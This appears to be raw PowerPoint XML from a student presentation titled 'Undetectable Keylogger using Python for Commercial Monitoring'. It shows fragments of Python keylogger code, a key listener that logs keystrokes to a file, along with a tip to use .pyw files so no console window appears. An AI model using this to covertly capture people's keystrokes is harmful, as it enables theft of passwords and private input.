                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    with Listener(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) as listener:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listener.join</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    with open("keylogger.txt", "a") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\n\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\n\n")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2029F1F2-6E29-4963-9A73-779798AF1709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="381000"/>
            <a:ext cx="33528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 main method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC66ABAC-EA08-4456-BB41-E49E10BDB216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="728642"/>
            <a:ext cx="5638800" cy="1077218"/>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 we are making a context manager named as Listener where with keyboard is used hence here we do not need to close, it works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">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automatically.So</a:t>
            </a:r>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 if the key is pressed then use on press method.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2073161D-B3B2-4ED0-BAE0-D8ED0D0F2973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="1858327"/>
            <a:ext cx="3962400" cy="584775"/>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//if key release then on release method invoked</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA18D4DB-92C8-4688-BFAB-5BEC4FD99ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2355314"/>
            <a:ext cx="58674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 therefore here we recording the keyboard strokes continuously</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A36F3B-BDB9-4B44-9277-48E552C77ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="3590964"/>
            <a:ext cx="4267200" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>// here we are splitting the sessions. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917FA517-D578-4493-B8E8-E813FE626388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4495800"/>
            <a:ext cx="8153400"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973F82C9-1335-4BBB-8D1D-179E6633DF6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4495800"/>
            <a:ext cx="8153400" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>For this project we are using .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>pyw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> extension file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>instead of .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B3B3B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>PYW files are used in Windows to indicate a script needs to be run using PYTHONW.EXE instead of PYTHON.EXE in order to prevent a DOS console from popping up to display the output. This patch makes it possible to import such scripts, in case they're also usable as modules.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="586025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4625</TotalTime>
  <Words>2258</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>223</Paragraphs>
  <Slides>16</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-apple-system</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Schoolbook</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Industry_Medium</vt:lpstr>
      <vt:lpstr>KasperskySans</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>SophosSans-Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Undetectable Keylogger using Python for Commercial Monitoring</vt:lpstr>
      <vt:lpstr>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 of Action</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>SRKNEC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M.Tech</dc:title>
  <dc:creator>S.D.Kamble</dc:creator>
  <cp:lastModifiedBy>shashankpawsekar@outlook.com</cp:lastModifiedBy>
  <cp:revision>612</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-07-14T07:14:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-17T03:48:05Z</dcterms:modified>
</cp:coreProperties>
</file>